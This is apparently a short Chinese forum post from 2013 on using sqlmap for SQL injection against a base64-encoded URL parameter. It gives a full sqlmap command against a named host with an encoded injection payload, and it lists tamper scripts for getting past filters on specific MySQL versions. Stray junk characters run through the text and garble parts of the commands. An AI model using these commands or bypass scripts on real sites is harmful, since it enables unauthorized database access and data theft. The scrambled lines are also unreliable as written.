WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?, h# [* V: Y# b7 I8 s5 M" C
1 K1 b. ?" p; V
sqlmap的tamper里有个base64encode.py
# o# p4 n" z# X
E: M! A) G: a8 v使用如下9 N6 {$ e" g% `) V" j
0 H3 h6 Q ?( Gsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs+ Q" w' {6 r* e7 h0 ~, O
: f% z- J8 S8 l
- M. d' K: d8 D2 `& {" G& Msqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”; P2 G3 f) X* q k) V# K9 I8 m( }
3 ]9 c1 X$ o0 F0 c% K
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:9 a# Z$ r, D- R) ]* [% E
/ a# p3 A3 `& S6 i0 c9 Q" j
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入+ w$ r, C7 w2 n) q; j. i
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
- M7 r! \9 b: \首先确定目标数据库版本,然后选择相应的脚本。$ t8 j* A5 }6 `5 l' B1 k
-v 3 --batch --tamper "space2hash.py"+ @# x+ }! H5 \) L6 d
& `0 {4 x; g4 f) ]& Z/ k0 t& d还有其他一些插件:
+ a- b7 `" A6 B* q6 ~encodes编码 ——charencode.py0 q% n! q. X. {% A1 f
base64编码 —— base64encode.py8 U, j+ w' Y1 \8 b. b
替换空格和关键字 —— halfversionedmorekeywords.py
$ b. C r6 x# ^$ \ |
$ m% A' H4 o& m T+ ], x- u" m- o2 J3 _" p' _7 q1 ]2 C
7 j' f" k* S" U5 B/ l+ J# \2 C: ]
8 E: I) Q" Z- `4 _7 }- [8 F3 ^
|
发表于 2013-11-23 15:50:45
收藏
支持
反对